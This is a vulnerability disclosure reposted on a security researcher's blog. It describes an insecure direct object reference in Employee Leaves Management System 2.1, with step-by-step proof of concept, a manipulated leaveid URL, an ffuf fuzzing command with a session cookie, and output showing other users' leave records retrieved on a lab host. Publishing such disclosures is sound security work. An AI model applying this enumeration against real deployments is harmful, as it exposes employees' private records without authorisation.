Khalil Shreateh specializes in cybersecurity, particularly as a "white hat" hacker. He focuses on identifying and reporting security vulnerabilities in software and online platforms, with notable expertise in web application security. His most prominent work includes discovering a critical flaw in Facebook's system in 2013. Additionally, he develops free social media tools and browser extensions, contributing to digital security and user accessibility.

Get Rid of Ads!


Subscribe now for only $3 a month and enjoy an ad-free experience.

Contact us at khalil@khalil-shreateh.com

Latest Posts

Employee Leaves Management System 2.1 Insecure Direct Object Reference

Details
Written by: khalil shreateh
Category: Vulnerabilities
Hits: 99
# Exploit Title: Employee Leaves Management System (ELMS) v2.1 -
Authenticated # Exploit Title: Employee Leaves Management System (ELMS) v2.1 -
Authenticated Insecure Direct Object References (IDOR)
# Date: 2025-03-04
# Exploit Author: Mehmet Can Kad?o?lu a.k.a mao7un
# Vendor: https://phpgurukul.com/employee-leaves-management-system-elms/
# Demo Site: https://phpgurukul.com/?sdm_process_download=1&download_id=7175
# Tested on: Kali Linux
# CVE: N/A

PoC:

1. Login as a employee
2. Go to leaves tab and you will see your own leaves there. Here you can
see the details of your leaves when you click on "view details" button for
your own leaves. However, you can see the leaves of any user by changing
the leaveid parameter here (leaveid=11)

3. try it another leaveid
http://10.0.2.15/leave-details.php?leaveid=12

4. read all of the leave contents of the another user

5. Fuzzing:
############### ############### ############### ###############

? ~ ffuf -c -ic -w leave_ids.txt -u
http://10.0.2.15/leave-details.php\?leaveid\=FUZZ -H 'Cookie:
PHPSESSID=9c73627bf340b4a369310b69ba48e325' -fw 3139

/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://10.0.2.15/leave-details.php?leaveid=FUZZ
:: Wordlist : FUZZ: /home/t00r6x0/leave_ids.txt
:: Header : Cookie: PHPSESSID=9c73627bf340b4a369310b69ba48e325
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response words: 3139
________________________________________________

12 [Status: 200, Size: 11186, Words: 4521, Lines: 233,
Duration: 9ms]
11 [Status: 200, Size: 11177, Words: 4522, Lines: 233,
Duration: 980ms]
13 [Status: 200, Size: 11148, Words: 4517, Lines: 233,
Duration: 991ms]



############### ############### ############### ###############


leaveid=12 and leaveid=13 do not belong to my user.
Social Media Share